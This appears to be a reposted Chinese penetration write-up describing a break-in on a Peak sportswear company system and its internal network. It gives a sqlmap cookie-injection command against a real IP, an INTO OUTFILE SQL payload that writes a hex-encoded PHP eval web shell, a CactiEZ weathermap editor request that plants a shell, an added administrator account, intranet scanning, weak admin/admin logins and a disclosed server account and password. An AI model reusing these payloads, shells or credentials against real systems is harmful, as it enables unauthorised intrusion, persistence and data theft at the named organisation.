匹克某系统getshell(一次成功的内网漫游\成功getshell某系统)
先来个cookie的sql注入
C:\Python27\sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql
直接getshell吧
http://*******/bugs/wooyun-2010-0130866
前辈的文章。在cookie处加入'即可获得绝对路径
C:\Program Files (x86)\Comexe\RasMini\rasweb\Apache2\htdocs\Smarty-2.6.19\Client\
绝对路径
getshell
RAS_UserInfo_UserName=wooyun' and 1=2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun.php'%23 可以看到前辈的这段代码是把
0x776F6F79756E3C3F70687020706870696E666F28293B3F3E
这段代码写到Client/wooyun.php里
利用了hex加密,把0x去掉解密可以看到是wooyun
成功写入
在把
wooyun
用hex加密
得到
0x776f6f79756e3c3f70687020406576616c28245f504f53545b776f6f79756e5d293b3f3e 直接干~~ 成功写入 密码wooyun 218.5.173.228:90/Client/wooyun2.php
cmd查看下权限
sy权限,直接添加管理员找端口,端口91.
成功进入
开启扫描器一顿扫射内网
发现了个
http://10.0.10.38
世纪互联CactiEZ的cms。直接getshell
/plugins/weathermap/editor.php?plug=0&mapname=sea.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name 直接访问,
http://10.0.10.38/plugins/weathermap/configs/sea.php
密码0
不知道为什么,服务器连接不上一句话。这很是费解
http://10.0.88.91/
又找了找 找到了这个
弱口令admin/admin
成功进入。
还有一个很奇怪的现象。
我发现许多内部系统连接的都是我上个sql注入
http://*****/bugs/wooyun-2016-0193268
http://10.0.6.19/eassso/login?service=http%3A%2F%2F10.0.6.19%3A6890%2Feasportal%2FssoWelcome%3FredirectTo%3D%2Findex_sso.jsp 随便点个公告都会跳到http://info.peaksport.com/ 里面应该会有管理员的帐号吧。不深入了 服务器帐号sea$密码sea
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻